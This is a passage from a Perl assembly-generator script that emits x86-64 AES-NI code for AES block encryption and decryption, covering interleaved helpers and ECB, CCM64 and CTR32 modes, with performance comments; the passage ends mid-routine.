# %xmm register layout
$rndkey0="%xmm0"; $rndkey1="%xmm1";
$inout0="%xmm2"; $inout1="%xmm3";
$inout2="%xmm4"; $inout3="%xmm5";
$inout4="%xmm6"; $inout5="%xmm7";
$inout6="%xmm8"; $inout7="%xmm9";
$in2="%xmm6"; $in1="%xmm7"; # used in CBC decrypt, CTR, ...
$in0="%xmm8"; $iv="%xmm9";
# Inline version of internal aesni_[en|de]crypt1.
#
# Why folded loop? Because aes[enc|dec] is slow enough to accommodate
# cycles which take care of loop variables...
{ my $sn;
sub aesni_generate1 {
my ($p,$key,$rounds,$inout,$ivec)=@_; $inout=$inout0 if (!defined($inout));
++$sn;
$code.=<<___;
$movkey ($key),$rndkey0
$movkey 16($key),$rndkey1
___
$code.=<<___ if (defined($ivec));
xorps $rndkey0,$ivec
lea 32($key),$key
xorps $ivec,$inout
___
$code.=<<___ if (!defined($ivec));
lea 32($key),$key
xorps $rndkey0,$inout
___
$code.=<<___;
.Loop_${p}1_$sn:
aes${p} $rndkey1,$inout
dec $rounds
$movkey ($key),$rndkey1
lea 16($key),$key
jnz .Loop_${p}1_$sn # loop body is 16 bytes
aes${p}last $rndkey1,$inout
___
}}
# void $PREFIX_[en|de]crypt (const void *inp,void *out,const AES_KEY *key);
#
{ my ($inp,$out,$key) = @_4args;
$code.=<<___;
.globl ${PREFIX}_encrypt
.type ${PREFIX}_encrypt,\@abi-omnipotent
.align 16
${PREFIX}_encrypt:
movups ($inp),$inout0 # load input
mov 240($key),$rounds # key->rounds
___
&aesni_generate1("enc",$key,$rounds);
$code.=<<___;
movups $inout0,($out) # output
ret
.size ${PREFIX}_encrypt,.-${PREFIX}_encrypt
.globl ${PREFIX}_decrypt
.type ${PREFIX}_decrypt,\@abi-omnipotent
.align 16
${PREFIX}_decrypt:
movups ($inp),$inout0 # load input
mov 240($key),$rounds # key->rounds
___
&aesni_generate1("dec",$key,$rounds);
$code.=<<___;
movups $inout0,($out) # output
ret
.size ${PREFIX}_decrypt, .-${PREFIX}_decrypt
___
}
# _aesni_[en|de]cryptN are private interfaces, N denotes interleave
# factor. Why 3x subroutine were originally used in loops? Even though
# aes[enc|dec] latency was originally 6, it could be scheduled only
# every *2nd* cycle. Thus 3x interleave was the one providing optimal
# utilization, i.e. when subroutine's throughput is virtually same as
# of non-interleaved subroutine [for number of input blocks up to 3].
# This is why it makes no sense to implement 2x subroutine.
# aes[enc|dec] latency in next processor generation is 8, but the
# instructions can be scheduled every cycle. Optimal interleave for
# new processor is therefore 8x...
sub aesni_generate3 {
my $dir=shift;
# As already mentioned it takes in $key and $rounds, which are *not*
# preserved. $inout[0-2] is cipher/clear text...
$code.=<<___;
.type _aesni_${dir}rypt3,\@abi-omnipotent
.align 16
_aesni_${dir}rypt3:
$movkey ($key),$rndkey0
shr \$1,$rounds
$movkey 16($key),$rndkey1
lea 32($key),$key
xorps $rndkey0,$inout0
xorps $rndkey0,$inout1
xorps $rndkey0,$inout2
$movkey ($key),$rndkey0
.L${dir}_loop3:
aes${dir} $rndkey1,$inout0
aes${dir} $rndkey1,$inout1
dec $rounds
aes${dir} $rndkey1,$inout2
$movkey 16($key),$rndkey1
aes${dir} $rndkey0,$inout0
aes${dir} $rndkey0,$inout1
lea 32($key),$key
aes${dir} $rndkey0,$inout2
$movkey ($key),$rndkey0
jnz .L${dir}_loop3
aes${dir} $rndkey1,$inout0
aes${dir} $rndkey1,$inout1
aes${dir} $rndkey1,$inout2
aes${dir}last $rndkey0,$inout0
aes${dir}last $rndkey0,$inout1
aes${dir}last $rndkey0,$inout2
ret
.size _aesni_${dir}rypt3,.-_aesni_${dir}rypt3
___
}
# 4x interleave is implemented to improve small block performance,
# most notably [and naturally] 4 block by ~30%. One can argue that one
# should have implemented 5x as well, but improvement would be <20%,
# so it's not worth it...
sub aesni_generate4 {
my $dir=shift;
# As already mentioned it takes in $key and $rounds, which are *not*
# preserved. $inout[0-3] is cipher/clear text...
$code.=<<___;
.type _aesni_${dir}rypt4,\@abi-omnipotent
.align 16
_aesni_${dir}rypt4:
$movkey ($key),$rndkey0
shr \$1,$rounds
$movkey 16($key),$rndkey1
lea 32($key),$key
xorps $rndkey0,$inout0
xorps $rndkey0,$inout1
xorps $rndkey0,$inout2
xorps $rndkey0,$inout3
$movkey ($key),$rndkey0
.L${dir}_loop4:
aes${dir} $rndkey1,$inout0
aes${dir} $rndkey1,$inout1
dec $rounds
aes${dir} $rndkey1,$inout2
aes${dir} $rndkey1,$inout3
$movkey 16($key),$rndkey1
aes${dir} $rndkey0,$inout0
aes${dir} $rndkey0,$inout1
lea 32($key),$key
aes${dir} $rndkey0,$inout2
aes${dir} $rndkey0,$inout3
$movkey ($key),$rndkey0
jnz .L${dir}_loop4
aes${dir} $rndkey1,$inout0
aes${dir} $rndkey1,$inout1
aes${dir} $rndkey1,$inout2
aes${dir} $rndkey1,$inout3
aes${dir}last $rndkey0,$inout0
aes${dir}last $rndkey0,$inout1
aes${dir}last $rndkey0,$inout2
aes${dir}last $rndkey0,$inout3
ret
.size _aesni_${dir}rypt4,.-_aesni_${dir}rypt4
___
}
sub aesni_generate6 {
my $dir=shift;
# As already mentioned it takes in $key and $rounds, which are *not*
# preserved. $inout[0-5] is cipher/clear text...
$code.=<<___;
.type _aesni_${dir}rypt6,\@abi-omnipotent
.align 16
_aesni_${dir}rypt6:
$movkey ($key),$rndkey0
shr \$1,$rounds
$movkey 16($key),$rndkey1
lea 32($key),$key
xorps $rndkey0,$inout0
pxor $rndkey0,$inout1
aes${dir} $rndkey1,$inout0
pxor $rndkey0,$inout2
aes${dir} $rndkey1,$inout1
pxor $rndkey0,$inout3
aes${dir} $rndkey1,$inout2
pxor $rndkey0,$inout4
aes${dir} $rndkey1,$inout3
pxor $rndkey0,$inout5
dec $rounds
aes${dir} $rndkey1,$inout4
$movkey ($key),$rndkey0
aes${dir} $rndkey1,$inout5
jmp .L${dir}_loop6_enter
.align 16
.L${dir}_loop6:
aes${dir} $rndkey1,$inout0
aes${dir} $rndkey1,$inout1
dec $rounds
aes${dir} $rndkey1,$inout2
aes${dir} $rndkey1,$inout3
aes${dir} $rndkey1,$inout4
aes${dir} $rndkey1,$inout5
.L${dir}_loop6_enter: # happens to be 16-byte aligned
$movkey 16($key),$rndkey1
aes${dir} $rndkey0,$inout0
aes${dir} $rndkey0,$inout1
lea 32($key),$key
aes${dir} $rndkey0,$inout2
aes${dir} $rndkey0,$inout3
aes${dir} $rndkey0,$inout4
aes${dir} $rndkey0,$inout5
$movkey ($key),$rndkey0
jnz .L${dir}_loop6
aes${dir} $rndkey1,$inout0
aes${dir} $rndkey1,$inout1
aes${dir} $rndkey1,$inout2
aes${dir} $rndkey1,$inout3
aes${dir} $rndkey1,$inout4
aes${dir} $rndkey1,$inout5
aes${dir}last $rndkey0,$inout0
aes${dir}last $rndkey0,$inout1
aes${dir}last $rndkey0,$inout2
aes${dir}last $rndkey0,$inout3
aes${dir}last $rndkey0,$inout4
aes${dir}last $rndkey0,$inout5
ret
.size _aesni_${dir}rypt6,.-_aesni_${dir}rypt6
___
}
sub aesni_generate8 {
my $dir=shift;
# As already mentioned it takes in $key and $rounds, which are *not*
# preserved. $inout[0-7] is cipher/clear text...
$code.=<<___;
.type _aesni_${dir}rypt8,\@abi-omnipotent
.align 16
_aesni_${dir}rypt8:
$movkey ($key),$rndkey0
shr \$1,$rounds
$movkey 16($key),$rndkey1
lea 32($key),$key
xorps $rndkey0,$inout0
xorps $rndkey0,$inout1
aes${dir} $rndkey1,$inout0
pxor $rndkey0,$inout2
aes${dir} $rndkey1,$inout1
pxor $rndkey0,$inout3
aes${dir} $rndkey1,$inout2
pxor $rndkey0,$inout4
aes${dir} $rndkey1,$inout3
pxor $rndkey0,$inout5
dec $rounds
aes${dir} $rndkey1,$inout4
pxor $rndkey0,$inout6
aes${dir} $rndkey1,$inout5
pxor $rndkey0,$inout7
$movkey ($key),$rndkey0
aes${dir} $rndkey1,$inout6
aes${dir} $rndkey1,$inout7
$movkey 16($key),$rndkey1
jmp .L${dir}_loop8_enter
.align 16
.L${dir}_loop8:
aes${dir} $rndkey1,$inout0
aes${dir} $rndkey1,$inout1
dec $rounds
aes${dir} $rndkey1,$inout2
aes${dir} $rndkey1,$inout3
aes${dir} $rndkey1,$inout4
aes${dir} $rndkey1,$inout5
aes${dir} $rndkey1,$inout6
aes${dir} $rndkey1,$inout7
$movkey 16($key),$rndkey1
.L${dir}_loop8_enter: # happens to be 16-byte aligned
aes${dir} $rndkey0,$inout0
aes${dir} $rndkey0,$inout1
lea 32($key),$key
aes${dir} $rndkey0,$inout2
aes${dir} $rndkey0,$inout3
aes${dir} $rndkey0,$inout4
aes${dir} $rndkey0,$inout5
aes${dir} $rndkey0,$inout6
aes${dir} $rndkey0,$inout7
$movkey ($key),$rndkey0
jnz .L${dir}_loop8
aes${dir} $rndkey1,$inout0
aes${dir} $rndkey1,$inout1
aes${dir} $rndkey1,$inout2
aes${dir} $rndkey1,$inout3
aes${dir} $rndkey1,$inout4
aes${dir} $rndkey1,$inout5
aes${dir} $rndkey1,$inout6
aes${dir} $rndkey1,$inout7
aes${dir}last $rndkey0,$inout0
aes${dir}last $rndkey0,$inout1
aes${dir}last $rndkey0,$inout2
aes${dir}last $rndkey0,$inout3
aes${dir}last $rndkey0,$inout4
aes${dir}last $rndkey0,$inout5
aes${dir}last $rndkey0,$inout6
aes${dir}last $rndkey0,$inout7
ret
.size _aesni_${dir}rypt8,.-_aesni_${dir}rypt8
___
}
&aesni_generate3("enc") if ($PREFIX eq "aesni");
&aesni_generate3("dec");
&aesni_generate4("enc") if ($PREFIX eq "aesni");
&aesni_generate4("dec");
&aesni_generate6("enc") if ($PREFIX eq "aesni");
&aesni_generate6("dec");
&aesni_generate8("enc") if ($PREFIX eq "aesni");
&aesni_generate8("dec");
if ($PREFIX eq "aesni") {
########################################################################
# void aesni_ecb_encrypt (const void *in, void *out,
# size_t length, const AES_KEY *key,
# int enc);
$code.=<<___;
.globl aesni_ecb_encrypt
.type aesni_ecb_encrypt,\@function,5
.align 16
aesni_ecb_encrypt:
___
$code.=<<___ if ($win64);
lea -0x58(%rsp),%rsp
movaps %xmm6,(%rsp)
movaps %xmm7,0x10(%rsp)
movaps %xmm8,0x20(%rsp)
movaps %xmm9,0x30(%rsp)
.Lecb_enc_body:
___
$code.=<<___;
and \$-16,$len
jz .Lecb_ret
mov 240($key),$rounds # key->rounds
$movkey ($key),$rndkey0
mov $key,$key_ # backup $key
mov $rounds,$rnds_ # backup $rounds
test %r8d,%r8d # 5th argument
jz .Lecb_decrypt
#--------------------------- ECB ENCRYPT ------------------------------#
cmp \$0x80,$len
jb .Lecb_enc_tail
movdqu ($inp),$inout0
movdqu 0x10($inp),$inout1
movdqu 0x20($inp),$inout2
movdqu 0x30($inp),$inout3
movdqu 0x40($inp),$inout4
movdqu 0x50($inp),$inout5
movdqu 0x60($inp),$inout6
movdqu 0x70($inp),$inout7
lea 0x80($inp),$inp
sub \$0x80,$len
jmp .Lecb_enc_loop8_enter
.align 16
.Lecb_enc_loop8:
movups $inout0,($out)
mov $key_,$key # restore $key
movdqu ($inp),$inout0
mov $rnds_,$rounds # restore $rounds
movups $inout1,0x10($out)
movdqu 0x10($inp),$inout1
movups $inout2,0x20($out)
movdqu 0x20($inp),$inout2
movups $inout3,0x30($out)
movdqu 0x30($inp),$inout3
movups $inout4,0x40($out)
movdqu 0x40($inp),$inout4
movups $inout5,0x50($out)
movdqu 0x50($inp),$inout5
movups $inout6,0x60($out)
movdqu 0x60($inp),$inout6
movups $inout7,0x70($out)
lea 0x80($out),$out
movdqu 0x70($inp),$inout7
lea 0x80($inp),$inp
.Lecb_enc_loop8_enter:
call _aesni_encrypt8
sub \$0x80,$len
jnc .Lecb_enc_loop8
movups $inout0,($out)
mov $key_,$key # restore $key
movups $inout1,0x10($out)
mov $rnds_,$rounds # restore $rounds
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
movups $inout5,0x50($out)
movups $inout6,0x60($out)
movups $inout7,0x70($out)
lea 0x80($out),$out
add \$0x80,$len
jz .Lecb_ret
.Lecb_enc_tail:
movups ($inp),$inout0
cmp \$0x20,$len
jb .Lecb_enc_one
movups 0x10($inp),$inout1
je .Lecb_enc_two
movups 0x20($inp),$inout2
cmp \$0x40,$len
jb .Lecb_enc_three
movups 0x30($inp),$inout3
je .Lecb_enc_four
movups 0x40($inp),$inout4
cmp \$0x60,$len
jb .Lecb_enc_five
movups 0x50($inp),$inout5
je .Lecb_enc_six
movdqu 0x60($inp),$inout6
call _aesni_encrypt8
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
movups $inout5,0x50($out)
movups $inout6,0x60($out)
jmp .Lecb_ret
.align 16
.Lecb_enc_one:
___
&aesni_generate1("enc",$key,$rounds);
$code.=<<___;
movups $inout0,($out)
jmp .Lecb_ret
.align 16
.Lecb_enc_two:
xorps $inout2,$inout2
call _aesni_encrypt3
movups $inout0,($out)
movups $inout1,0x10($out)
jmp .Lecb_ret
.align 16
.Lecb_enc_three:
call _aesni_encrypt3
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
jmp .Lecb_ret
.align 16
.Lecb_enc_four:
call _aesni_encrypt4
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
jmp .Lecb_ret
.align 16
.Lecb_enc_five:
xorps $inout5,$inout5
call _aesni_encrypt6
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
jmp .Lecb_ret
.align 16
.Lecb_enc_six:
call _aesni_encrypt6
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
movups $inout5,0x50($out)
jmp .Lecb_ret
#--------------------------- ECB DECRYPT ------------------------------#
.align 16
.Lecb_decrypt:
cmp \$0x80,$len
jb .Lecb_dec_tail
movdqu ($inp),$inout0
movdqu 0x10($inp),$inout1
movdqu 0x20($inp),$inout2
movdqu 0x30($inp),$inout3
movdqu 0x40($inp),$inout4
movdqu 0x50($inp),$inout5
movdqu 0x60($inp),$inout6
movdqu 0x70($inp),$inout7
lea 0x80($inp),$inp
sub \$0x80,$len
jmp .Lecb_dec_loop8_enter
.align 16
.Lecb_dec_loop8:
movups $inout0,($out)
mov $key_,$key # restore $key
movdqu ($inp),$inout0
mov $rnds_,$rounds # restore $rounds
movups $inout1,0x10($out)
movdqu 0x10($inp),$inout1
movups $inout2,0x20($out)
movdqu 0x20($inp),$inout2
movups $inout3,0x30($out)
movdqu 0x30($inp),$inout3
movups $inout4,0x40($out)
movdqu 0x40($inp),$inout4
movups $inout5,0x50($out)
movdqu 0x50($inp),$inout5
movups $inout6,0x60($out)
movdqu 0x60($inp),$inout6
movups $inout7,0x70($out)
lea 0x80($out),$out
movdqu 0x70($inp),$inout7
lea 0x80($inp),$inp
.Lecb_dec_loop8_enter:
call _aesni_decrypt8
$movkey ($key_),$rndkey0
sub \$0x80,$len
jnc .Lecb_dec_loop8
movups $inout0,($out)
mov $key_,$key # restore $key
movups $inout1,0x10($out)
mov $rnds_,$rounds # restore $rounds
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
movups $inout5,0x50($out)
movups $inout6,0x60($out)
movups $inout7,0x70($out)
lea 0x80($out),$out
add \$0x80,$len
jz .Lecb_ret
.Lecb_dec_tail:
movups ($inp),$inout0
cmp \$0x20,$len
jb .Lecb_dec_one
movups 0x10($inp),$inout1
je .Lecb_dec_two
movups 0x20($inp),$inout2
cmp \$0x40,$len
jb .Lecb_dec_three
movups 0x30($inp),$inout3
je .Lecb_dec_four
movups 0x40($inp),$inout4
cmp \$0x60,$len
jb .Lecb_dec_five
movups 0x50($inp),$inout5
je .Lecb_dec_six
movups 0x60($inp),$inout6
$movkey ($key),$rndkey0
call _aesni_decrypt8
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
movups $inout5,0x50($out)
movups $inout6,0x60($out)
jmp .Lecb_ret
.align 16
.Lecb_dec_one:
___
&aesni_generate1("dec",$key,$rounds);
$code.=<<___;
movups $inout0,($out)
jmp .Lecb_ret
.align 16
.Lecb_dec_two:
xorps $inout2,$inout2
call _aesni_decrypt3
movups $inout0,($out)
movups $inout1,0x10($out)
jmp .Lecb_ret
.align 16
.Lecb_dec_three:
call _aesni_decrypt3
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
jmp .Lecb_ret
.align 16
.Lecb_dec_four:
call _aesni_decrypt4
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
jmp .Lecb_ret
.align 16
.Lecb_dec_five:
xorps $inout5,$inout5
call _aesni_decrypt6
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
jmp .Lecb_ret
.align 16
.Lecb_dec_six:
call _aesni_decrypt6
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
movups $inout5,0x50($out)
.Lecb_ret:
___
$code.=<<___ if ($win64);
movaps (%rsp),%xmm6
movaps 0x10(%rsp),%xmm7
movaps 0x20(%rsp),%xmm8
movaps 0x30(%rsp),%xmm9
lea 0x58(%rsp),%rsp
.Lecb_enc_ret:
___
$code.=<<___;
ret
.size aesni_ecb_encrypt,.-aesni_ecb_encrypt
___
{
######################################################################
# void aesni_ccm64_[en|de]crypt_blocks (const void *in, void *out,
# size_t blocks, const AES_KEY *key,
# const char *ivec,char *cmac);
#
# Handles only complete blocks, operates on 64-bit counter and
# does not update *ivec! Nor does it finalize CMAC value
# (see engine/eng_aesni.c for details)
#
{
my $cmac="%r9"; # 6th argument
my $increment="%xmm6";
my $bswap_mask="%xmm7";
$code.=<<___;
.globl aesni_ccm64_encrypt_blocks
.type aesni_ccm64_encrypt_blocks,\@function,6
.align 16
aesni_ccm64_encrypt_blocks:
___
$code.=<<___ if ($win64);
lea -0x58(%rsp),%rsp
movaps %xmm6,(%rsp)
movaps %xmm7,0x10(%rsp)
movaps %xmm8,0x20(%rsp)
movaps %xmm9,0x30(%rsp)
.Lccm64_enc_body:
___
$code.=<<___;
mov 240($key),$rounds # key->rounds
movdqu ($ivp),$iv
movdqa .Lincrement64(%rip),$increment
movdqa .Lbswap_mask(%rip),$bswap_mask
shr \$1,$rounds
lea 0($key),$key_
movdqu ($cmac),$inout1
movdqa $iv,$inout0
mov $rounds,$rnds_
pshufb $bswap_mask,$iv
jmp .Lccm64_enc_outer
.align 16
.Lccm64_enc_outer:
$movkey ($key_),$rndkey0
mov $rnds_,$rounds
movups ($inp),$in0 # load inp
xorps $rndkey0,$inout0 # counter
$movkey 16($key_),$rndkey1
xorps $in0,$rndkey0
lea 32($key_),$key
xorps $rndkey0,$inout1 # cmac^=inp
$movkey ($key),$rndkey0
.Lccm64_enc2_loop:
aesenc $rndkey1,$inout0
dec $rounds
aesenc $rndkey1,$inout1
$movkey 16($key),$rndkey1
aesenc $rndkey0,$inout0
lea 32($key),$key
aesenc $rndkey0,$inout1
$movkey 0($key),$rndkey0
jnz .Lccm64_enc2_loop
aesenc $rndkey1,$inout0
aesenc $rndkey1,$inout1
paddq $increment,$iv
aesenclast $rndkey0,$inout0
aesenclast $rndkey0,$inout1
dec $len
lea 16($inp),$inp
xorps $inout0,$in0 # inp ^= E(iv)
movdqa $iv,$inout0
movups $in0,($out) # save output
lea 16($out),$out
pshufb $bswap_mask,$inout0
jnz .Lccm64_enc_outer
movups $inout1,($cmac)
___
$code.=<<___ if ($win64);
movaps (%rsp),%xmm6
movaps 0x10(%rsp),%xmm7
movaps 0x20(%rsp),%xmm8
movaps 0x30(%rsp),%xmm9
lea 0x58(%rsp),%rsp
.Lccm64_enc_ret:
___
$code.=<<___;
ret
.size aesni_ccm64_encrypt_blocks,.-aesni_ccm64_encrypt_blocks
___
######################################################################
$code.=<<___;
.globl aesni_ccm64_decrypt_blocks
.type aesni_ccm64_decrypt_blocks,\@function,6
.align 16
aesni_ccm64_decrypt_blocks:
___
$code.=<<___ if ($win64);
lea -0x58(%rsp),%rsp
movaps %xmm6,(%rsp)
movaps %xmm7,0x10(%rsp)
movaps %xmm8,0x20(%rsp)
movaps %xmm9,0x30(%rsp)
.Lccm64_dec_body:
___
$code.=<<___;
mov 240($key),$rounds # key->rounds
movups ($ivp),$iv
movdqu ($cmac),$inout1
movdqa .Lincrement64(%rip),$increment
movdqa .Lbswap_mask(%rip),$bswap_mask
movaps $iv,$inout0
mov $rounds,$rnds_
mov $key,$key_
pshufb $bswap_mask,$iv
___
&aesni_generate1("enc",$key,$rounds);
$code.=<<___;
movups ($inp),$in0 # load inp
paddq $increment,$iv
lea 16($inp),$inp
jmp .Lccm64_dec_outer
.align 16
.Lccm64_dec_outer:
xorps $inout0,$in0 # inp ^= E(iv)
movdqa $iv,$inout0
mov $rnds_,$rounds
movups $in0,($out) # save output
lea 16($out),$out
pshufb $bswap_mask,$inout0
sub \$1,$len
jz .Lccm64_dec_break
$movkey ($key_),$rndkey0
shr \$1,$rounds
$movkey 16($key_),$rndkey1
xorps $rndkey0,$in0
lea 32($key_),$key
xorps $rndkey0,$inout0
xorps $in0,$inout1 # cmac^=out
$movkey ($key),$rndkey0
.Lccm64_dec2_loop:
aesenc $rndkey1,$inout0
dec $rounds
aesenc $rndkey1,$inout1
$movkey 16($key),$rndkey1
aesenc $rndkey0,$inout0
lea 32($key),$key
aesenc $rndkey0,$inout1
$movkey 0($key),$rndkey0
jnz .Lccm64_dec2_loop
movups ($inp),$in0 # load inp
paddq $increment,$iv
aesenc $rndkey1,$inout0
aesenc $rndkey1,$inout1
lea 16($inp),$inp
aesenclast $rndkey0,$inout0
aesenclast $rndkey0,$inout1
jmp .Lccm64_dec_outer
.align 16
.Lccm64_dec_break:
#xorps $in0,$inout1 # cmac^=out
___
&aesni_generate1("enc",$key_,$rounds,$inout1,$in0);
$code.=<<___;
movups $inout1,($cmac)
___
$code.=<<___ if ($win64);
movaps (%rsp),%xmm6
movaps 0x10(%rsp),%xmm7
movaps 0x20(%rsp),%xmm8
movaps 0x30(%rsp),%xmm9
lea 0x58(%rsp),%rsp
.Lccm64_dec_ret:
___
$code.=<<___;
ret
.size aesni_ccm64_decrypt_blocks,.-aesni_ccm64_decrypt_blocks
___
}
######################################################################
# void aesni_ctr32_encrypt_blocks (const void *in, void *out,
# size_t blocks, const AES_KEY *key,
# const char *ivec);
#
# Handles only complete blocks, operates on 32-bit counter and
# does not update *ivec! (see engine/eng_aesni.c for details)
#
{
my $reserved = $win64?0:-0x28;
my ($in0,$in1,$in2,$in3)=map("%xmm$_",(8..11));
my ($iv0,$iv1,$ivec)=("%xmm12","%xmm13","%xmm14");
my $bswap_mask="%xmm15";
$code.=<<___;
.globl aesni_ctr32_encrypt_blocks
.type aesni_ctr32_encrypt_blocks,\@function,5
.align 16
aesni_ctr32_encrypt_blocks:
___
$code.=<<___ if ($win64);
lea -0xc8(%rsp),%rsp
movaps %xmm6,0x20(%rsp)
movaps %xmm7,0x30(%rsp)
movaps %xmm8,0x40(%rsp)
movaps %xmm9,0x50(%rsp)
movaps %xmm10,0x60(%rsp)
movaps %xmm11,0x70(%rsp)
movaps %xmm12,0x80(%rsp)
movaps %xmm13,0x90(%rsp)
movaps %xmm14,0xa0(%rsp)
movaps %xmm15,0xb0(%rsp)
.Lctr32_body:
___
$code.=<<___;
cmp \$1,$len
je .Lctr32_one_shortcut
movdqu ($ivp),$ivec
movdqa .Lbswap_mask(%rip),$bswap_mask
xor $rounds,$rounds
pextrd \$3,$ivec,$rnds_ # pull 32-bit counter
pinsrd \$3,$rounds,$ivec # wipe 32-bit counter
mov 240($key),$rounds # key->rounds
bswap $rnds_
pxor $iv0,$iv0 # vector of 3 32-bit counters
pxor $iv1,$iv1 # vector of 3 32-bit counters
pinsrd \$0,$rnds_,$iv0
lea 3($rnds_),$key_
pinsrd \$0,$key_,$iv1
inc $rnds_
pinsrd \$1,$rnds_,$iv0
inc $key_
pinsrd \$1,$key_,$iv1
inc $rnds_
pinsrd \$2,$rnds_,$iv0
inc $key_
pinsrd \$2,$key_,$iv1
movdqa $iv0,$reserved(%rsp)
pshufb $bswap_mask,$iv0
movdqa $iv1,`$reserved+0x10`(%rsp)
pshufb $bswap_mask,$iv1
pshufd \$`3<<6`,$iv0,$inout0 # place counter to upper dword
pshufd \$`2<<6`,$iv0,$inout1
pshufd \$`1<<6`,$iv0,$inout2
cmp \$6,$len
jb .Lctr32_tail
shr \$1,$rounds
mov $key,$key_ # backup $key
mov $rounds,$rnds_ # backup $rounds
sub \$6,$len
jmp .Lctr32_loop6
.align 16
.Lctr32_loop6:
pshufd \$`3<<6`,$iv1,$inout3
por $ivec,$inout0 # merge counter-less ivec
$movkey ($key_),$rndkey0
pshufd \$`2<<6`,$iv1,$inout4
por $ivec,$inout1
$movkey 16($key_),$rndkey1
pshufd \$`1<<6`,$iv1,$inout5
por $ivec,$inout2
por $ivec,$inout3
xorps $rndkey0,$inout0
por $ivec,$inout4
por $ivec,$inout5
# inline _aesni_encrypt6 and interleave last rounds
# with own code...
pxor $rndkey0,$inout1
aesenc $rndkey1,$inout0
lea 32($key_),$key
pxor $rndkey0,$inout2
aesenc $rndkey1,$inout1
movdqa .Lincrement32(%rip),$iv1
pxor $rndkey0,$inout3
aesenc $rndkey1,$inout2
movdqa $reserved(%rsp),$iv0
pxor $rndkey0,$inout4
aesenc $rndkey1,$inout3
pxor $rndkey0,$inout5
$movkey ($key),$rndkey0
dec $rounds
aesenc $rndkey1,$inout4
aesenc $rndkey1,$inout5
jmp .Lctr32_enc_loop6_enter
.align 16
.Lctr32_enc_loop6:
aesenc $rndkey1,$inout0
aesenc $rndkey1,$inout1
dec $rounds
aesenc $rndkey1,$inout2
aesenc $rndkey1,$inout3
aesenc $rndkey1,$inout4
aesenc $rndkey1,$inout5
.Lctr32_enc_loop6_enter:
$movkey 16($key),$rndkey1
aesenc $rndkey0,$inout0
aesenc $rndkey0,$inout1
lea 32($key),$key
aesenc $rndkey0,$inout2
aesenc $rndkey0,$inout3
aesenc $rndkey0,$inout4
aesenc $rndkey0,$inout5
$movkey ($key),$rndkey0
jnz .Lctr32_enc_loop6
aesenc $rndkey1,$inout0
paddd $iv1,$iv0 # increment counter vector
aesenc $rndkey1,$inout1
paddd `$reserved+0x10`(%rsp),$iv1
aesenc $rndkey1,$inout2
movdqa $iv0,$reserved(%rsp) # save counter vector
aesenc $rndkey1,$inout3
movdqa $iv1,`$reserved+0x10`(%rsp)
aesenc $rndkey1,$inout4
pshufb $bswap_mask,$iv0 # byte swap
aesenc $rndkey1,$inout5
pshufb $bswap_mask,$iv1
aesenclast $rndkey0,$inout0
movups ($inp),$in0 # load input
aesenclast $rndkey0,$inout1
movups 0x10($inp),$in1
aesenclast $rndkey0,$inout2
movups 0x20($inp),$in2
aesenclast $rndkey0,$inout3
movups 0x30($inp),$in3
aesenclast $rndkey0,$inout4
movups 0x40($inp),$rndkey1
aesenclast $rndkey0,$inout5
movups 0x50($inp),$rndkey0
lea 0x60($inp),$inp
xorps $inout0,$in0 # xor
pshufd \$`3<<6`,$iv0,$inout0
xorps $inout1,$in1
pshufd \$`2<<6`,$iv0,$inout1
movups $in0,($out) # store output
xorps $inout2,$in2
pshufd \$`1<<6`,$iv0,$inout2
movups $in1,0x10($out)
xorps $inout3,$in3
movups $in2,0x20($out)
xorps $inout4,$rndkey1
movups $in3,0x30($out)
xorps $inout5,$rndkey0
movups $rndkey1,0x40($out)
movups $rndkey0,0x50($out)
lea 0x60($out),$out
mov $rnds_,$rounds
sub \$6,$len
jnc .Lctr32_loop6
add \$6,$len
jz .Lctr32_done
mov $key_,$key # restore $key
lea 1($rounds,$rounds),$rounds # restore original value
.Lctr32_tail:
por $ivec,$inout0
movups ($inp),$in0
cmp \$2,$len
jb .Lctr32_one
por $ivec,$inout1
movups 0x10($inp),$in1
je .Lctr32_two
pshufd \$`3<<6`,$iv1,$inout3
por $ivec,$inout2
movups 0x20($inp),$in2
cmp \$4,$len
jb .Lctr32_three
pshufd \$`2<<6`,$iv1,$inout4
por $ivec,$inout3
movups 0x30($inp),$in3
je .Lctr32_four
por $ivec,$inout4
xorps $inout5,$inout5
call _aesni_encrypt6
movups 0x40($inp),$rndkey1
xorps $inout0,$in0
xorps $inout1,$in1
movups $in0,($out)
xorps $inout2,$in2
movups $in1,0x10($out)
xorps $inout3,$in3
movups $in2,0x20($out)
xorps $inout4,$rndkey1
movups $in3,0x30($out)
movups $rndkey1,0x40($out)
jmp .Lctr32_done
.align 16
.Lctr32_one_shortcut:
movups ($ivp),$inout0
movups ($inp),$in0
mov 240($key),$rounds # key->rounds
.Lctr32_one:
___
&aesni_generate1("enc",$key,$rounds);
$code.=<<___;
xorps $inout0,$in0
movups $in0,($out)
jmp .Lctr32_done
.align 16
.Lctr32_two:
xorps $inout2,$inout2
call _aesni_encrypt3
xorps $inout0,$in0
xorps $inout1,$in1
movups $in0,($out)
movups $in1,0x10($out)
jmp .Lctr32_done
.align 16
.Lctr32_three:
call _aesni_encrypt3
xorps $inout0,$in0
xorps $inout1,$in1
movups $in0,($out)
xorps $inout2,$in2
movups $in1,0x10($out)
movups $in2,0x20($out)
jmp .Lctr32_done
.align 16
.Lctr32_four:
call _aesni_encrypt4
